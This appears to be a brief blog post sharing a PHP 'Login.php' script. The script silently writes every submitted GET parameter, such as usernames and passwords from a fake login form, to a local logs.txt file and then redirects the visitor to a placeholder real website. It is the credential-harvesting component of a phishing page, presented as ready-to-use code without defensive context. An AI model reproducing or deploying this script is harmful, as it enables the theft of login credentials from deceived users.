Login.php script
Login.php script
<?php
header("Location: https://YOUR_WEBSITE_TO REDIRECT");
$handle = fopen("logs.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Comments
Post a Comment